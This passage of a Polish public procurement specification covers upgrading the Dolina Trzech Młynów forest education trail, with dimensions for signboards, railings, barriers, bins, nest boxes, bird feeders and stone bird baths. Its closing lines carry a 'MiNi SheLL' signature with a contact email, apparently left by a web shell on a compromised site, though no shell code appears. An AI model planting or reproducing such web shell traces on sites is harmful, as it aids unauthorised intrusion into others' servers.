- wysokość: 40 x 40
- każda stopa musi zawierać cztery metalowe kotwy, do których należy przymocować stelaż tablicy

d) Opis  planszy informacyjnej:
- rozmiar planszy informacyjnej dostosować do wymiarów pola przeznaczonego na jej umieszczenie oraz umocować za pomocą drewnianych listew przymocowanych do stelaża,
- plansza informacyjna musi być wykonana metodą druku solwentowego na podłożu z blachy ocynkowanej, musi być wykonana bardzo trwale oraz odporna na warunki atmosferyczne,
- plansza musi zawierać tło, ilustracje oraz tekst, materiały potrzebne do wykonania plansz (t. j. teksty, zdjęcia, grafiki) Wykonawca otrzyma od Zamawiającego na etapie realizacji, 
- Wykonawca po otrzymaniu od Zamawiającego odpowiednich materiałów tematycznych dla planszy, przekaże je grafikowi w celu zaprojektowania formy graficznej.
- projekty planszy Wykonawca przedstawi Zamawiającemu w celu ustalenia ewentualnych poprawek lub akceptacji,
 - tablica zostanie umieszczona na początku ścieżki edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo (przy Nadleśnictwie Bogdaniec).

Wymiary elementów stelaża zawarte zostały na zdjęciach stanowiących załącznik nr 14 do SIWZ.
Wszystkie drewniane elementy tablic impregnowane dwu krotnie w kolorze typu palisander.

2.4. Wykonanie i montaż 5 sztuk tablic porządkowych ze stelażem z wałków toczonych z drewna akacjowego lub dębowego o średnicy 10 cm:
a)  wymiary stelaża:
- wysokość: 285 cm,
- szerokość: 120 cm,
b) wymiary pola przeznaczonego na planszę porządkową:
- wysokość: 80 cm,
- szerokość: 60 cm,

c) Opis plansz porządkowych:
- rozmiar planszy porządkowej dostosować do wymiarów pola przeznaczonego na jej umieszczenie oraz umocować za pomocą drewnianych listew przymocowanych do stelaża,
- plansza edukacyjna musi być wykonana metodą druku solwentowego na podłożu z blachy ocynkowanej, musi być wykonana bardzo trwale oraz odporna na warunki atmosferyczne,
- plansza musi zawierać tło oraz tekst, materiały potrzebne do wykonania plansz (t. j. teksty) Wykonawca otrzyma od Zamawiającego na etapie realizacji,
- Wykonawca po otrzymaniu od Zamawiającego odpowiednich materiałów dla każdej planszy, przekaże je grafikowi w celu zaprojektowania formy graficznej.
- projekty planszy Wykonawca przedstawi Zamawiającemu w celu ustalenia ewentualnych poprawek lub akceptacji,
 - tablice zostaną rozmieszczone na ścieżce edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo, całkowita długość ścieżki wynosi 4,8 km.

Wzór tablic wraz z wymiarami stanowi załącznik nr 15 do SIWZ.
Wszystkie drewniane elementy tablic impregnowane dwu krotnie w kolorze typu palisander. 

3. Budowa małej infrastruktury ścieżki:
a) Wykonanie i montaż wzdłuż utwardzonego odcinka ścieżki drewnianych podwójnych balustrad z żerdzi toczonych na słupkach z drewna akacjowego lub dębowego. Balustrady wykonać wg rysunku stanowiącego załącznik nr 16 do SIWZ. Wszystkie elementy balustrad impregnowane dwu krotnie w kolorze typu palisander.

b) Wykonanie i montaż 30 sztuk podwójnych drewnianych szlabanów z żerdzi toczonych, na słupkach z drewna akacjowego lub dębowego. Szlabany wykonać wg rysunku stanowiącego załącznik nr 17 do SIWZ. Wszystkie elementy szlabanów impregnowane dwu krotnie w kolorze typu palisander.

c) Wykonanie i montaż 8 sztuk impregnowanych dwu krotnie w kolorze typu palisander koszy na śmieci wykonanych z półwałków z drewna akacjowego lub dębowego wg załącznika nr 18 do SIWZ.

d) Wykonanie i montaż 25 sztuk budek lęgowych typu A, dla ptaków:
- szczegółowy opis budek zawarty jest w załączniku nr 19 do SIWZ.

e) Wykonanie i montaż 25 sztuk budek lęgowych typu B, dla ptaków:
- szczegółowy opis budek zawarty jest w załączniku nr 20 do SIWZ.

f) Wykonanie i montaż 20 sztuk drewnianych karmników dla ptaków:

Wykonanie i montaż 5 sztuk karmników z daszkiem dwu spadowym wykonanych z nieokorowanych, naturalnych elementów drewna akacjowego lub dębowego o wymiarach:
- szerokość daszku: 50 cm,
- długość daszku: 25 cm,
- szerokość podstawy: 30 cm,
- długość 15 cm,
- odległość między środkiem daszku a podstawą: 30 cm,
- odległość między bokami daszku a podstawą: 15 cm.
- krawędź podstawy zabezpieczająca przed wysypywaniem ziaren: 2 cm
- daszek połączyć z podstawą za pomocą czterech słupków,
- na tylnej części karmnika zamontować uchwyt umożliwiający montaż karmnika.

Wykonanie i montaż 5 sztuk karmników z daszkiem jedno spadowym wykonanych z nieokorowanych, naturalnych elementów drewna akacjowego lub dębowego o wymiarach:
- szerokość daszku: 35 cm,
- długość daszku: 20 cm,
- szerokość podstawy: 35cm,
- długość podstawy: 15 cm,
- odległość między tylną częścią daszku a podstawą: 18 cm,
- odległość między przednią częścią daszku a podstawą: 15 cm
- krawędź podstawy zabezpieczająca przed wysypywaniem ziaren: 2 cm
- daszek połączyć z podstawą za pomocą czterech słupków,
- na tylnej części karmnika zamontować uchwyt umożliwiający montaż karmnika.

Wykonanie i montaż 10 sztuk okrągłych karmników wykonanych z nieokorowanych, naturalnych elementów drewna akacjowego lub dębowego o wymiarach:
- wysokość karmnika z daszkiem: 40 cm,
- średnica: 25 cm,
- odległość między daszkiem a podstawą: 15 cm,
- daszek połączyć z podstawą za pomocą trzech słupków,
- krawędź podstawy zabezpieczająca przed wysypywaniem ziaren: 2 cm,
- w górnej części daszka zamontować metalowy uchwyt umożliwiający montaż karmnika za pomocą linki (sznurka).

Szlabany, kosze na śmieci, budki lęgowe oraz karmniki zostaną rozmieszczone na ścieżce edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo, całkowita długość ścieżki wynosi 4,8 km.

g) Wykonanie i montaż 10 sztuk kamiennych poideł dla ptaków o kształcie nieregularnym z wydrążoną misą zbierającą wodę o średnicy minimalnej 30 cm i głębokości 15 cm. Wysokość poidła kamiennego licząc od gruntu, na którym będzie ustawione powinna wynosić minimum 30 cm. Poidła zostaną rozmieszczone na ścieżce edukacyjnej Dolina Trzech Młynów znajdującej się na terenie Leśnictwa Motylewo, całkowita długość ścieżki wynosi 4,8 km.

Przedmiotem zamówienia jest modernizacja istniejącej ścieżki dydaktycznej pod nazwą Dolina Trzech Młynów poprzez wykonanie utwardzenia gruntowej nawierzchni ścieżki za pomocą geokraty, wykonanie drewnianych balustrad, oznakowanie ścieżki poprzez wykonanie i montaż tablic edukacyjnych, informacyjnych i porządkowych oraz budowę małej infrastruktury ścieżki w postaci drewnianych szlabanów, drewnianych koszy na śmieci, wykonanie i montaż budek lęgowych, karmników oraz poideł dla ptaków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.23.31.41-9, 45.22.38.00-4, 30.19.50.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com